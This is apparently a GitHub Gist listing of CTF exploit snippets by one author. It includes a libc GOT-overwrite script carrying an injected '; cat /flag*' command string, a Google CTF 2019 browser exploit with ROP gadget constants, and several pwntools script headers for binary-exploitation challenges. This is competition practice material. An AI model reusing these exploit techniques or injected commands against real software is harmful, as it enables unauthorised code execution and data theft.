hama hama7230
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| let tmp = Array.create(0x10); | |
| print("hogeogehohoge; cat /flag* ; cat /flag*; cat /flag*; "); // " | |
| // 0xdeadbeef000000a8 | |
| let a = -11885953953521044204262283356352921729787255120762006772597472279566207698356848245844122139069258806622701577786132951422544398067457110976011173888.0000000000000--; | |
| let offset_libc_got = 0x319f58 / 8 -11 + 0x3000/8; | |
| let mod = 6.7946279131188262738573787925444e-318; | |
| Array.set(tmp, offset_libc_got, Array.get(tmp,offset_libc_got ) - mod); | |
| print(1); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from pwn import * | |
| context(terminal=['tmux', 'splitw', '-h']) # horizontal split window | |
| # context(terminal=['tmux', 'new-window']) # open new window | |
| # libc = ELF('') | |
| elf = ELF('./chall') | |
| context(os='linux', arch=elf.arch) | |
| # context(log_level='debug') # output verbose log |
hama7230
/ exploit.htm
Last active
August 17, 2020 19:47
Google Capture The Flag 2019 (Finals) Gomium Browser
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <script type="text/goscript"> | |
| package main | |
| import "fmt" | |
| func bring_your_own_gadgts(x uint64, y uint64, z uint64, w uint64, v uint64) uint64 { | |
| var a uint64 = 0xc3050f585a5e5f58; | |
| var b uint64 = 0xdeadbeefdeadbeef+1 | |
| var c uint64 = 0xdeadbeefdeadbeef+2 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from pwn import * | |
| context(terminal=['tmux', 'splitw', '-h']) # horizontal split window | |
| # context(terminal=['tmux', 'new-window']) # open new window | |
| # libc = ELF('') | |
| elf = ELF('./lazyhouse') | |
| context(os='linux', arch=elf.arch) | |
| # context(log_level='debug') # output verbose log |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from pwn import * | |
| context(terminal=['tmux', 'splitw', '-h']) # horizontal split window | |
| # context(terminal=['tmux', 'new-window']) # open new window | |
| # libc = ELF('') | |
| elf = ELF('./one_punch') | |
| context(os='linux', arch=elf.arch) | |
| # context(log_level='debug') # output verbose log |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # -*- coding: utf-8 -*- | |
| from pwn import * | |
| context(terminal=['tmux', 'splitw', '-h']) # horizontal split window | |
| # context(terminal=['tmux', 'new-window']) # open new window | |
| # libc = ELF('') | |
| elf = ELF('./emojivm') | |
| context(os='linux', arch=elf.arch) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from pwn import * | |
| context(terminal=['tmux', 'splitw', '-h']) # horizontal split window | |
| # context(terminal=['tmux', 'new-window']) # open new window | |
| # libc = ELF('') | |
| elf = ELF('./trick_or_treat') | |
| context(os='linux', arch=elf.arch) | |
| context(log_level='debug') # output verbose log |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from pwn import * | |
| from Crypto.Cipher import AES | |
| import struct | |
| import hashlib | |
| import sys | |
| from socket import inet_aton | |
| context(terminal=['tmux', 'splitw', '-h']) # horizontal split window | |
| # context(terminal=['tmux', 'new-window']) # open new window |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| I'm not the author of "gnote". the autor is ga_ryo_ | |
| However I wrote my own exploit code to check if the challenge is solvable before starting the contest. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define PROT_READ 0x1 /* Page can be read. */ | |
| #define PROT_WRITE 0x2 /* Page can be written. */ | |
| #define MAP_PRIVATE 0x02 /* Changes are private. */ | |
| #define MAP_ANONYMOUS 0x20 /* Don't use a file. */ | |
| #define MAP_POPULATE 0x8000 | |
| #define MAP_FIXED 0x10 | |
| #define MAP_GROWSDOWN 0x0100 | |
| #define O_RDWR 2 | |
| #define O_NOCTTY 00000400 | |
| #define O_RDONLY 00000000 |
NewerOlder